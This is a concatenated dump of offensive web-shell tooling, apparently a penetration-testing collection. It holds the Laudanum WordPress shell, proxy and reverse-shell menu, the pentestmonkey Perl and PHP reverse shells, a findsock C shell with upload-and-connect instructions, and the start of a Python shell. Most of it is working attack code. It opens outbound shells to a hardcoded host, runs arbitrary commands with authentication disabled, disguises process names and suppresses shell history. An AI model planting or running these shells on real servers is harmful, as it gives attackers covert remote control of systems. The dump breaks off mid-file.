| 177 | fclose($sock); 178 | fclose($pipes[0]); 179 | fclose($pipes[1]); 180 | fclose($pipes[2]); 181 | proc_close($process); 182 | 183 | // Like print, but does nothing if we've daemonised ourself 184 | // (I can't figure out how to redirect STDOUT like a proper daemon) 185 | function printit ($string) { 186 | if (!$daemon) { 187 | print "$string\n"; 188 | } 189 | } 190 | 191 | ?> 192 | 193 | 194 | 195 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/proxy.php: -------------------------------------------------------------------------------- 1 | 15 | *** 16 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 17 | *** 18 | ******************************************************************************** 19 | *** 20 | *** This file acts as a browser-based proxy. 21 | *** Written by Tim Medin 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page 42 | // figure out how to reuse sessionid from the remote site 43 | 44 | include 'ipcheck.php'; 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. */ 49 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP Proxy 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |

68 |

73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | set_error_handler('error_handler'); 80 | 81 | function geturlarray($u) { 82 | // creates the url array, addes a scheme if it is missing and retries parsing 83 | $o = parse_url($u); 84 | if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } 85 | if (!isset($o["path"])) { $o["path"] = "/"; } 86 | return $o; 87 | } 88 | 89 | function buildurl ($u) { 90 | // build the url from the url array 91 | // this is used because the built in function isn't 92 | // avilable in all installs of php 93 | if (!isset($u["host"])) { return null; } 94 | 95 | $s = isset($u["scheme"]) ? $u["scheme"] : "http"; 96 | $s .= "://" . $u["host"]; 97 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 98 | $s .= isset($u["path"]) ? $u["path"] : "/"; 99 | $s .= isset($u["query"]) ? "?" . $u["query"] : ""; 100 | $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; 101 | return $s; 102 | } 103 | 104 | function buildurlpath ($u) { 105 | //gets the full url and attempts to remove the file at the end of the url 106 | // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ 107 | if (!isset($u["host"])) { return null; } 108 | 109 | $s = isset($u["scheme"])? $u["scheme"] : "http"; 110 | $s .= "://" . $u["host"]; 111 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 112 | 113 | $path = isset($u["path"]) ? $u["path"] : "/"; 114 | // is the last portion of the path a file or a dir? 115 | // assume if there is a . it is a file 116 | // if it ends in a / then it is a dir 117 | // if neither, than assume dir 118 | $dirs = explode("/", $path); 119 | $last = $dirs[count($dirs) - 1]; 120 | if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { 121 | // its a file, remove the last chunk 122 | $path = substr($path, 0, -1 * strlen($last)); 123 | } 124 | 125 | $s .= $path; 126 | return $s; 127 | } 128 | 129 | function getfilename ($u) { 130 | // returns the file name 131 | // e.g. http://blah.com/dir/file.ext returns file.ext 132 | // technically, it is the last portion of the url, so there is a potential 133 | // for a problem if a http://blah.com/dir returns a file 134 | $s = explode("/", $u["path"]); 135 | return $s[count($s) - 1]; 136 | } 137 | 138 | function getcontenttype ($headers) { 139 | // gets the content type 140 | foreach($headers as $h) { 141 | if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { 142 | return $out[1][0]; 143 | } 144 | } 145 | } 146 | 147 | function getcontentencoding ($headers) { 148 | foreach ($headers as $h) { 149 | if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { 150 | return $out[1][0]; 151 | } 152 | } 153 | } 154 | 155 | function removeheader($header, $headers) { 156 | foreach (array_keys($headers) as $key) { 157 | if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { 158 | unset($headers[$key]); 159 | return $headers; 160 | } 161 | } 162 | } 163 | 164 | function rewritecookies($headers) { 165 | // removes the path and domain from cookies 166 | for ($i = 0; $i < count($headers); $i++) { 167 | if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { 168 | $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); 169 | $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); 170 | } 171 | } 172 | return $headers; 173 | } 174 | 175 | function getsessionid($headers) { 176 | for ($i = 0; $i < count($headers); $i++) { 177 | if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) 178 | return $out[1][0]; 179 | } 180 | return "0"; 181 | } 182 | 183 | function compatible_gzinflate($gzData) { 184 | if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { 185 | $i = 10; 186 | $flg = ord( substr($gzData, 3, 1) ); 187 | if ( $flg > 0 ) { 188 | if ( $flg & 4 ) { 189 | list($xlen) = unpack('v', substr($gzData, $i, 2) ); 190 | $i = $i + 2 + $xlen; 191 | } 192 | if ( $flg & 8 ) 193 | $i = strpos($gzData, "\0", $i) + 1; 194 | if ( $flg & 16 ) 195 | $i = strpos($gzData, "\0", $i) + 1; 196 | if ( $flg & 2 ) 197 | $i = $i + 2; 198 | } 199 | return @gzinflate( substr($gzData, $i, -8) ); 200 | } else { 201 | return false; 202 | } 203 | return false; 204 | } 205 | 206 | function rewrite ($d, $u) { 207 | $r = $d; 208 | //rewrite images and links - absolute reference 209 | $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); 210 | //rewrite images and links - hard linked 211 | $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); 212 | //rewrite images and links - relative reference 213 | $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); 214 | 215 | 216 | //rewrite form - absolute reference 217 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 218 | //rewrite form - hard linked 219 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 220 | //rewrite form - relative reference 221 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 222 | return $r; 223 | } 224 | 225 | /* Initialize some variables we need again and again. */ 226 | $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; 227 | if ($url == "") { 228 | $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; 229 | } 230 | 231 | if ($url == "") { 232 | ?> 233 | 235 | 236 | 237 | Laudanum PHP Proxy 238 | 239 | 240 | 245 | 246 | 247 | 248 |

Laudanum PHP Proxy

249 | 250 | 254 |

255 |

260 | 261 | 262 | 263 | 337 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/settings.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a convenient menu of Laudanum tools from a Word Press settings 20 | *** page. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | ?> 42 | 43 | 44 |

45 |

Laudanum Tools

46 |

Shell
DNS
Host Lookup
File Browser
Proxy
Reverse Shell - 54 |
55 | IP: 56 | Port: 57 |
58 | 59 |
kill nc (recover if nc screws up your shell)

65 | * for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888" 66 |

67 | -------------------------------------------------------------------------------- /laudanum/wordpress/templates/shell.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides shell access to the system. It is built based on the 2.1 20 | *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler 21 | *** 22 | *** 23 | *** Updated by Tim Medin 24 | *** 25 | ******************************************************************************** 26 | *** This program is free software; you can redistribute it and/or 27 | *** modify it under the terms of the GNU General Public License 28 | *** as published by the Free Software Foundation; either version 2 29 | *** of the License, or (at your option) any later version. 30 | *** 31 | *** This program is distributed in the hope that it will be useful, 32 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | *** GNU General Public License for more details. 35 | *** 36 | *** You can get a copy of the GNU General Public License from this 37 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 39 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 40 | *** 41 | ***************************************************************************** */ 42 | 43 | 44 | include 'ipcheck.php'; 45 | 46 | 47 | /* This error handler will turn all notices, warnings, and errors into fatal 48 | * errors, unless they have been suppressed with the @-operator. */ 49 | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 50 | /* The @-opertor (used with chdir() below) temporarely makes 51 | * error_reporting() return zero, and we don't want to die in that case. 52 | * We do note the error in the output, though. */ 53 | if (error_reporting() == 0) { 54 | $_SESSION['output'] .= $errstr . "\n"; 55 | } else { 56 | die(' 58 | 59 | 60 | Laudanum PHP Shell Access 61 | 62 | 63 |

Fatal Error!

64 |

' . $errstr . '

65 |

in ' . $errfile . ', line ' . $errline . '.

66 | 67 |

68 |

73 | 74 | 75 | '); 76 | } 77 | } 78 | 79 | // set_error_handler('wpl_error_handler'); 80 | 81 | 82 | function logout() { 83 | $_SESSION = array('authenticated' => false); 84 | if (isset($_COOKIE[session_name()])) 85 | setcookie(session_name(), '', time()-42000, '/'); 86 | session_destroy(); 87 | } 88 | 89 | 90 | function wpl_stripslashes_deep($value) { 91 | if (is_array($value)) 92 | return array_map('stripslashes_deep', $value); 93 | else 94 | return stripslashes($value); 95 | } 96 | 97 | if (get_magic_quotes_gpc()) 98 | $_POST = stripslashes_deep($_POST); 99 | 100 | /* Initialize some variables we need again and again. */ 101 | //$username = isset($_POST['username']) ? $_POST['username'] : ''; 102 | //$password = isset($_POST['password']) ? $_POST['password'] : ''; 103 | //$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; 104 | 105 | $command = isset($_POST['command']) ? $_POST['command'] : ''; 106 | $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; 107 | $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; 108 | 109 | 110 | ///* Default settings --- these settings should always be set to something. */ 111 | //$default_settings = array('home-directory' => '.'); 112 | 113 | ///* Merge settings. */ 114 | //$ini['settings'] = array_merge($default_settings, $ini['settings']); 115 | 116 | 117 | session_start(); 118 | 119 | /* Delete the session data if the user requested a logout. This leaves the 120 | * session cookie at the user, but this is not important since we 121 | * authenticates on $_SESSION['authenticated']. */ 122 | if (isset($_POST['logout'])) 123 | logout(); 124 | 125 | ///* Attempt authentication. */ 126 | //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 127 | // isset($ini['users'][$username])) { 128 | // if (strchr($ini['users'][$username], ':') === false) { 129 | // // No seperator found, assume this is a password in clear text. 130 | // $_SESSION['authenticated'] = ($ini['users'][$username] == $password); 131 | // } else { 132 | // list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); 133 | // $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); 134 | // } 135 | //} 136 | 137 | /* Attempt authentication. */ 138 | if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) 139 | $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); 140 | 141 | /* Enforce default non-authenticated state if the above code didn't set it 142 | * already. */ 143 | if (!isset($_SESSION['authenticated'])) 144 | $_SESSION['authenticated'] = false; 145 | 146 | if(true) { 147 | //if ($_SESSION['authenticated']) { 148 | /* Initialize the session variables. */ 149 | if (empty($_SESSION['cwd'])) { 150 | $_SESSION['cwd'] = '.'; 151 | $_SESSION['history'] = array(); 152 | $_SESSION['output'] = ''; 153 | } 154 | 155 | if (!empty($command)) { 156 | /* Save the command for late use in the JavaScript. If the command is 157 | * already in the history, then the old entry is removed before the 158 | * new entry is put into the list at the front. */ 159 | if (($i = array_search($command, $_SESSION['history'])) !== false) 160 | unset($_SESSION['history'][$i]); 161 | 162 | array_unshift($_SESSION['history'], $command); 163 | 164 | /* Now append the commmand to the output. */ 165 | $_SESSION['output'] .= '$ ' . $command . "\n"; 166 | 167 | /* Initialize the current working directory. */ 168 | if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { 169 | $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); 170 | } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { 171 | /* The current command is a 'cd' command which we have to handle 172 | * as an internal shell command. */ 173 | 174 | if ($regs[1]{0} == '/') { 175 | /* Absolute path, we use it unchanged. */ 176 | $new_dir = $regs[1]; 177 | } else { 178 | /* Relative path, we append it to the current working 179 | * directory. */ 180 | $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; 181 | } 182 | 183 | /* Transform '/./' into '/' */ 184 | while (strpos($new_dir, '/./') !== false) 185 | $new_dir = str_replace('/./', '/', $new_dir); 186 | 187 | /* Transform '//' into '/' */ 188 | while (strpos($new_dir, '//') !== false) 189 | $new_dir = str_replace('//', '/', $new_dir); 190 | 191 | /* Transform 'x/..' into '' */ 192 | while (preg_match('|/\.\.(?!\.)|', $new_dir)) 193 | $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); 194 | 195 | if ($new_dir == '') $new_dir = '/'; 196 | 197 | /* Try to change directory. */ 198 | if (@chdir($new_dir)) { 199 | $_SESSION['cwd'] = $new_dir; 200 | } else { 201 | $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; 202 | } 203 | 204 | } elseif (trim($command) == 'exit') { 205 | logout(); 206 | } else { 207 | 208 | /* The command is not an internal command, so we execute it after 209 | * changing the directory and save the output. */ 210 | chdir($_SESSION['cwd']); 211 | 212 | // We canot use putenv() in safe mode. 213 | if (!ini_get('safe_mode')) { 214 | // Advice programs (ls for example) of the terminal size. 215 | putenv('ROWS=' . $rows); 216 | putenv('COLUMNS=' . $columns); 217 | } 218 | 219 | /* Alias expansion. */ 220 | $length = strcspn($command, " \t"); 221 | $token = substr($command, 0, $length); 222 | if (isset($ini['aliases'][$token])) 223 | $command = $ini['aliases'][$token] . substr($command, $length); 224 | 225 | $io = array(); 226 | $p = proc_open($command, 227 | array(1 => array('pipe', 'w'), 228 | 2 => array('pipe', 'w')), 229 | $io); 230 | 231 | /* Read output sent to stdout. */ 232 | while (!feof($io[1])) { 233 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 234 | ENT_COMPAT, 'UTF-8'); 235 | } 236 | /* Read output sent to stderr. */ 237 | while (!feof($io[2])) { 238 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 239 | ENT_COMPAT, 'UTF-8'); 240 | } 241 | 242 | fclose($io[1]); 243 | fclose($io[2]); 244 | proc_close($p); 245 | } 246 | } 247 | 248 | /* Build the command history for use in the JavaScript */ 249 | if (empty($_SESSION['history'])) { 250 | $js_command_hist = '""'; 251 | } else { 252 | $escaped = array_map('addslashes', $_SESSION['history']); 253 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 254 | } 255 | } 256 | 257 | ?> 258 | 260 | 261 | 262 | Laudanum Shell 263 | 264 | 265 | 303 | 304 | 305 | 306 | 307 |

Laudanum Shell

308 | 309 | 379 | 380 | 381 |

382 |

387 | 388 | 389 | 390 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-05-26 perl-reverse-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/COPYING.PERL-REVERSE-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /perl-reverse-shell-1.0/perl-reverse-shell.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # perl-reverse-shell - A Reverse Shell implementation in PERL 3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net 4 | # 5 | # This tool may be used for legal purposes only. Users take full responsibility 6 | # for any actions performed using this tool. The author accepts no liability 7 | # for damage caused by this tool. If these terms are not acceptable to you, then 8 | # do not use this tool. 9 | # 10 | # In all other respects the GPL version 2 applies: 11 | # 12 | # This program is free software; you can redistribute it and/or modify 13 | # it under the terms of the GNU General Public License version 2 as 14 | # published by the Free Software Foundation. 15 | # 16 | # This program is distributed in the hope that it will be useful, 17 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 18 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 19 | # GNU General Public License for more details. 20 | # 21 | # You should have received a copy of the GNU General Public License along 22 | # with this program; if not, write to the Free Software Foundation, Inc., 23 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 24 | # 25 | # This tool may be used for legal purposes only. Users take full responsibility 26 | # for any actions performed using this tool. If these terms are not acceptable to 27 | # you, then do not use this tool. 28 | # 29 | # You are encouraged to send comments, improvements or suggestions to 30 | # me at pentestmonkey@pentestmonkey.net 31 | # 32 | # Description 33 | # ----------- 34 | # This script will make an outbound TCP connection to a hardcoded IP and port. 35 | # The recipient will be given a shell running as the current user (apache normally). 36 | # 37 | 38 | use strict; 39 | use Socket; 40 | use FileHandle; 41 | use POSIX; 42 | my $VERSION = "1.0"; 43 | 44 | # Where to send the reverse shell. Change these. 45 | my $ip = '127.0.0.1'; 46 | my $port = 1234; 47 | 48 | # Options 49 | my $daemon = 1; 50 | my $auth = 0; # 0 means authentication is disabled and any 51 | # source IP can access the reverse shell 52 | my $authorised_client_pattern = qr(^127\.0\.0\.1$); 53 | 54 | # Declarations 55 | my $global_page = ""; 56 | my $fake_process_name = "/usr/sbin/apache"; 57 | 58 | # Change the process name to be less conspicious 59 | $0 = "[httpd]"; 60 | 61 | # Authenticate based on source IP address if required 62 | if (defined($ENV{'REMOTE_ADDR'})) { 63 | cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}"); 64 | 65 | if ($auth) { 66 | unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) { 67 | cgiprint("ERROR: Your client isn't authorised to view this page"); 68 | cgiexit(); 69 | } 70 | } 71 | } elsif ($auth) { 72 | cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access"); 73 | cgiexit(0); 74 | } 75 | 76 | # Background and dissociate from parent process if required 77 | if ($daemon) { 78 | my $pid = fork(); 79 | if ($pid) { 80 | cgiexit(0); # parent exits 81 | } 82 | 83 | setsid(); 84 | chdir('/'); 85 | umask(0); 86 | } 87 | 88 | # Make TCP connection for reverse shell 89 | socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')); 90 | if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) { 91 | cgiprint("Sent reverse shell to $ip:$port"); 92 | cgiprintpage(); 93 | } else { 94 | cgiprint("Couldn't open reverse shell to $ip:$port: $!"); 95 | cgiexit(); 96 | } 97 | 98 | # Redirect STDIN, STDOUT and STDERR to the TCP connection 99 | open(STDIN, ">&SOCK"); 100 | open(STDOUT,">&SOCK"); 101 | open(STDERR,">&SOCK"); 102 | $ENV{'HISTFILE'} = '/dev/null'; 103 | system("w;uname -a;id;pwd"); 104 | exec({"/bin/sh"} ($fake_process_name, "-i")); 105 | 106 | # Wrapper around print 107 | sub cgiprint { 108 | my $line = shift; 109 | $line .= "

\n"; 110 | $global_page .= $line; 111 | } 112 | 113 | # Wrapper around exit 114 | sub cgiexit { 115 | cgiprintpage(); 116 | exit 0; # 0 to ensure we don't give a 500 response. 117 | } 118 | 119 | # Form HTTP response using all the messages gathered by cgiprint so far 120 | sub cgiprintpage { 121 | print "Content-Length: " . length($global_page) . "\r 122 | Connection: close\r 123 | Content-Type: text\/html\r\n\r\n" . $global_page; 124 | } 125 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-09-02 php-findsock-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/COPYING.PHP-FINDSOCK-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /php-findsock-shell-1.0/findsock.c: -------------------------------------------------------------------------------- 1 | // php-findsock-shell - A Findsock Shell implementation in PHP + C 2 | // Copyright (C) 2007 pentestmonkey@pentestmonkey.net 3 | // 4 | // This tool may be used for legal purposes only. Users take full responsibility 5 | // for any actions performed using this tool. The author accepts no liability 6 | // for damage caused by this tool. If these terms are not acceptable to you, then 7 | // do not use this tool. 8 | // 9 | // In all other respects the GPL version 2 applies: 10 | // 11 | // This program is free software; you can redistribute it and/or modify 12 | // it under the terms of the GNU General Public License version 2 as 13 | // published by the Free Software Foundation. 14 | // 15 | // This program is distributed in the hope that it will be useful, 16 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 17 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 18 | // GNU General Public License for more details. 19 | // 20 | // You should have received a copy of the GNU General Public License along 21 | // with this program; if not, write to the Free Software Foundation, Inc., 22 | // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 23 | // 24 | // You are encouraged to send comments, improvements or suggestions to 25 | // me at pentestmonkey@pentestmonkey.net 26 | // 27 | // Description 28 | // ----------- 29 | // (Pair of) Web server scripts that find the TCP socket being used by the 30 | // client to connect to the web server and attaches a shell to it. This 31 | // provides you, the pentester, with a fully interactive shell even if the 32 | // Firewall is performing proper ingress and egress filtering. 33 | // 34 | // Proper interactive shells are more useful than web-based shell in some 35 | // circumstances, e.g: 36 | // 1: You want to change your user with "su" 37 | // 2: You want to upgrade your shell using a local exploit 38 | // 3: You want to log into another system using telnet / ssh 39 | // 40 | // Limitations 41 | // ----------- 42 | // The shell traffic doesn't look much like HTTP, so I guess that you may 43 | // have problems if the site is being protected by a Layer 7 (Application layer) 44 | // Firewall. 45 | // 46 | // The shell isn't fully implemented in PHP: you also need to upload a 47 | // C program. You need to either: 48 | // 1: Compile the program for the appropriate OS / architecture then 49 | // upload it; or 50 | // 2: Upload the source and hope there's a C compiler installed. 51 | // 52 | // This is a pain, but I couldn't figure out how to implement the findsock 53 | // mechanism in PHP. Email me if you manage it. I'd love to know. 54 | // 55 | // Only tested on x86 / amd64 Gentoo Linux. 56 | // 57 | // Usage 58 | // ----- 59 | // See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck. 60 | // 61 | // Here are some brief instructions. 62 | // 63 | // 1: Compile findsock.c for use on the target web server: 64 | // $ gcc -o findsock findsock.c 65 | // 66 | // Bear in mind that the web server might be running a different OS / architecture to you. 67 | // 68 | // 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using 69 | // whichever upload vulnerability you've indentified. Both should be uploaded to the 70 | // same directory. 71 | // 72 | // 3: Run the shell from a netcat session (NOT a browser - remember this is an 73 | // interactive shell). 74 | // 75 | // $ nc -v target 80 76 | // target [10.0.0.1] 80 (http) open 77 | // GET /php-findsock-shell.php HTTP/1.0 78 | // 79 | // sh-3.2$ id 80 | // uid=80(apache) gid=80(apache) groups=80(apache) 81 | // sh-3.2$ 82 | // ... you now have an interactive shell ... 83 | // 84 | 85 | #include 86 | #include 87 | #include 88 | #include 89 | #include 90 | #include 91 | 92 | int main (int argc, char** argv) { 93 | // Usage message 94 | if (argc != 3) { 95 | printf("Usage: findsock ip port\n"); 96 | exit(0); 97 | } 98 | 99 | // Process args 100 | char *sock_ip = argv[1]; 101 | char *sock_port = argv[2]; 102 | 103 | // Declarations 104 | struct sockaddr_in rsa; 105 | struct sockaddr_in lsa; 106 | int size = sizeof(rsa); 107 | char remote_ip[30]; 108 | int fd; 109 | 110 | // Inspect all file handles 111 | for (fd=3; fd 89 | 90 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/CHANGELOG: -------------------------------------------------------------------------------- 1 | 2 | 2007-05-26 php-reverse-shell v1.0 3 | 4 | * Initial public release 5 | 6 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/COPYING.PHP-REVERSE-SHELL: -------------------------------------------------------------------------------- 1 | This tool may be used for legal purposes only. Users take full responsibility 2 | for any actions performed using this tool. The author accepts no liability for 3 | damage caused by this tool. If these terms are not acceptable to you, then do 4 | not use this tool. 5 | 6 | In all other respects the GPL version 2 applies. 7 | -------------------------------------------------------------------------------- /php-reverse-shell-1.0/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | if ($debug) printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /simple_py_shell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # imports here 3 | # Copyright 2012 TrustedSec, LLC. All rights reserved. 4 | # 5 